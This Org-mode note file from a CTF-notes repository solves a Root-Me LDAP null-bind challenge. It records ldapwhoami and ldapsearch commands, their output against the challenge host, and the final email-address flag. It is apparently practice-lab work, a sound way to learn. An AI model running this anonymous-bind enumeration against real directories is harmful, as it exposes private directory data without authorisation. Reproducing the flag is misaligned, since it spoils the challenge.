tudattr/ctf-notes
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
de25173927f8eb394dd6b07def3fca5b271ff0a5
ctf-notes/network/lda-null-bind/notes.org
Tuan-Dat Tran de25173927 feat ldap-null-bind 
Signed-off-by: Tuan-Dat Tran <tuan-dat.tran@dextradata.com>
2026-03-21 13:54:37 +01:00

62 lines
2.1 KiB
Org Mode
Raw Blame History

* LDAP - null bind
** Notes
- https://repository.root-me.org/RFC/EN%20-%20rfc4512.txt
- https://stackoverflow.com/questions/18756688/what-are-cn-ou-dc-in-an-ldap-search
** Task
Aufgabe
Es scheint, dass einer der Anonymen einen neuen Zweig im LDAP-Verzeichnis erstellt hat, irgendwo in :
dc=challenge01,dc=root-me,dc=org
Verschaffen Sie sich Zugang zu seinen Daten und erhalten Sie seine E-Mail-Adresse.
Zugangsdaten für die Übung
Host challenge01.root-me.org
Protokoll TCP
Port 54013
** Findings
- Challenge type: LDAP anonymous/null bind enumeration.
- Base DN: dc=challenge01,dc=root-me,dc=org
- Target: find the branch created by an anonymous user and extract their email address.
** Useful tools
- ldapsearch (required)
- ldapwhoami (quick null-bind check)
- openssl s_client (optional, for TLS troubleshooting)
** Recon commands
#+begin_src bash
ldapwhoami -x -H ldap://challenge01.root-me.org:54013
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(mail=*)"
#+end_src
** Execution log
- Verified anonymous bind:
#+begin_src bash
ldapwhoami -x -H ldap://challenge01.root-me.org:54013
# anonymous
#+end_src
- Direct subtree query on base DN is blocked:
#+begin_src bash
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
# result: 50 Insufficient access
#+end_src
- Enumerated likely child DNs and found readable branch:
#+begin_src bash
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" -s base "(objectClass=*)" dn
# dn: ou=anonymous,dc=challenge01,dc=root-me,dc=org
#+end_src
- Dumped subtree under readable branch:
#+begin_src bash
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
# dn: uid=sabu,ou=anonymous,dc=challenge01,dc=root-me,dc=org
# mail: sabu@anonops.org
#+end_src
** Flag / answer
- Email address: sabu@anonops.org
Reference in New Issue View Git Blame Copy Permalink